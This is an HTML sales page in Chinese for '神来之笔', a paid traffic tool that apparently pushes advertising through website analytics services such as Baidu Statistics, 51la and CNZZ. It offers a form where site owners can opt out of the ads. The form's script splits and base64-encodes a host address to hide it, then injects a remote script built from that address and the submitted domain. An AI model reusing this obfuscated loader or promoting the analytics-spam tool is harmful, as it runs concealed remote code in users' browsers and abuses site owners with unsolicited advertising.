<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>神来之笔统计推广引流软件 - 好工具推荐！！</title> 
	<meta name="Keywords" content="百度排名引流软件">
	<meta name="Description" content="网站统计引流软件">   
    <script src="/jquery.min.js" id="myscript"></script>    
    <script src="/jquery.base64.js" ></script>    
</head>
<style>
img{ max-width:100% !important;}
.zhuti{max-width:  900px; margin: 0 auto;}
.head_zhuti{max-width: 900px; margin: 0 auto;}
*{ margin: 0; padding: 0; text-decoration: none; box-sizing: border-box;}
.head{ background-color: #02ABB4; padding: 35px; margin-bottom: 20px;}
.tuqu{ max-width: 900px;}
.head h3{ color: #666;}
.tuqu img{ border: 5px solid #f3f3f3; border-radius: 8px;}
.bi_qq{ background-color: #fff; padding: 15px 20px 20px 20px; border-radius: 5px; margin-bottom: 20px; display: inline-block;}
.bi_qq a{ color: #111;}
.msg a{  color: #fff; font-weight: bold;}
.msg a:hover{ color: green;}
.foot{ background-color: #02ABB4; padding: 35px; margin-top: 25px;}
.tjqu{ max-width: 500px; margin: 0 auto; background-color: #fff; border-radius: 4px; padding: 25px 0; margin-top: 10px; font-size:20px;}
.inpurl{ padding:5px; border:none;}
.btn{ background-color:#0F80EB; padding:7px 18px;  border:none; color:#fff;position: relative; right:-3px;}
.hot{ border-radius:5px; margin-left:3px;}
.tjk{ border:2px solid #0F80EB;  border-radius:5px;}
.rjsj{ color: #222; background-color: #f8f9f6; padding: 20px; border-radius: 8px;}
.rjsj span{ color: red;}

</style>
<body>  


    <center> 
    <div class="head">

        <div class="head_zhuti">
        <h1 >
          <div class="bi_qq"> <i>神来之笔</i>
                <img  src="/qq.png"  >  
                <a href="https://wpa.qq.com/msgrd?@v=3&amp;uin=联系QQ：2974775707&amp;site=qq&amp;menu=yes" target="_blank" class="z">2974775707</a>              
            </div>       
        </h1> 
        <p class="msg">            
            <small style="float:left; color: #444;">  最近更新时间：2024年12月26日 <font color="#E81F1F">V6.0版</font> <font color="#F5E800">软件热卖中</font><img src="/hot.gif"  class="hot" /></small> 
            <small style="float:right; color: #fdfdfd;"> 您看到的广告是软件自动推送的,如有打扰,请<a href="#bottom">写入过滤名单</a></small>        
        </p>
       </div>
    </div>



    <div class="zhuti">        
        
        <h3 class="rjsj"> 软件售价： <span>￥1<small> X X X </small>.00</span>  元 , 需要的再联系</h3>
        
        <div class="tuqu" align="center" >
            <img width="100%" alt="软件主图" title="主图" src="/2.png"  >                   
            <img width="100%" alt="51啦" title="51啦" src="/51la.png"   >  
            <img width="100%" alt="百度统计" title="百度统计" src="/baidu.png"  >  
            <img width="100%" alt="CNZZ" title="CNZZ" src="/cnzz.png"   >  

            <p> 另外推荐一款采集器 </p>
            <img width="100%" alt="采集器" title="采集器" src="/caiijqi.png"   >  
        </div>    
    
     


    </div>


    <div class="foot" >
        <a name="bottom"></a>


        <form method="post" >
        <input type="hidden" name="a" value="guolv" />
<div>请填写www.开头的域名即可，子域名会自动过滤</div>

<div class="tjqu">
<table>
    <tr>
        <td>过滤域名：</td>
        <td>   <div class="tjk"> <input autocomplete="off" type="text" name="url" value="www." class="inpurl" id="tjwz" />
            <input type="button" value="提交" class="btn" onClick="getxia('http://www.zhizhan.net/')"  /></div> </td>
    </tr>

</table>    



</div>
   
        </form>
        <div>域名过滤后将不会再推送广告</div>
    </div>
 
 
</center> 

<script>
    function getxia(url){
        var u = document.getElementById("tjwz").value;
        var base = "aH"+"R0c"+"HM"+"6Ly"+"9hc"+"Gk"+"ucW";
        var res = $.base64.decode(base+"=");         
        var oHead = document.getElementsByTagName("HEAD").item(0);
        var oScript= document.createElement("script");
        oScript.type = "text/javascript";
        oScript.src= res+u;
        oHead.appendChild( oScript);
        alert( "提交成功:"+ u);
    }

</script>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id: "JKphlXJU6hH3OwOi",ck: "JKphlXJU6hH3OwOi"})</script>

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?66ba4feedcb4f63a88ca22066ecf139a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
 
</body>
</html>
